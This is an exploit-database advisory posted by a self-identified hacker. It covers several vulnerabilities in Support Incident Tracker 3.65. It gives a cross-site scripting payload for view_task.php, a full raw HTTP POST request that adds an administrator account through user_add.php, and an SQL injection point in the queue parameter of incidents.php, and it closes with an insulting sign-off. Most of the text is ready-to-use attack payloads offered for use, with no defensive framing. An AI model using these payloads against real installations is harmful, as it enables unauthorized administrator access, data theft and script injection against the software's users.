Support Incident Tracker Multiple Vulnerability



EKU-ID: 1892 CVE: OSVDB-ID:
Author: L3b-r1'z Published: 2012-04-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#########
# Author : L3b-r1'z
# Title : Support Incident Tracker Multiple Vulnerability
# Email : L3br1z@gmail.com
# Site : Sec4Leb.Com
# Download : http://sourceforge.net/projects/sitracker/files/stable/3.65/sit_3.65.tar.gz/download
#########


  # # #           # # #     # #                                           # #                   
    #           #       #     #                                             #                   
    #                   #     #   # #                     # #   # #         #         # # # # # 
    #               # #       # #     #     # # # # #       # #             #         #     #   
    #     #             #     #       #                     #               #             #     
    #     #     #       #     #       #                     #               #           #     # 
  # # # # #       # # #     # # # # #                     # # # #       # # # # #     # # # # # 



Xss Vuln 

[+] P0c :

Open site and in b0x search put your code alert xss .

in file view_task.php?id=1
submit your xss code : <script>alert("1337day")</script>

Add Admin Vuln

[+] P0c :

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/sit-3.65/user_add.php?action=showform
Cookie: SiTsessionID=b0e72bd1560746bc60ceb71a3d836054
Content-Type: application/x-www-form-urlencoded
Content-Length: 243

realname=1337day&username=1337day&password=1337day&groupid=0&roleid=1&jobtitle=1337day&email=1337day@1337day.1337day&phone=1337day&mobile=1337day&fax=1337day&holiday_entitlement=21&startdate=&formtoken=7809f76811dc36c4920a4a4bac36d7627ff96072&submit=Add+User

you can inject the code from POST like hackbar :D

Sql Injection :
http://localhost/sit-3.65/incidents.php?user=all&queue=1&type=support

http://localhost/sit-3.65/incidents.php?user=all&queue=[SQL]&type=support


./EOE

Note : Fuck To All the Lamer'z .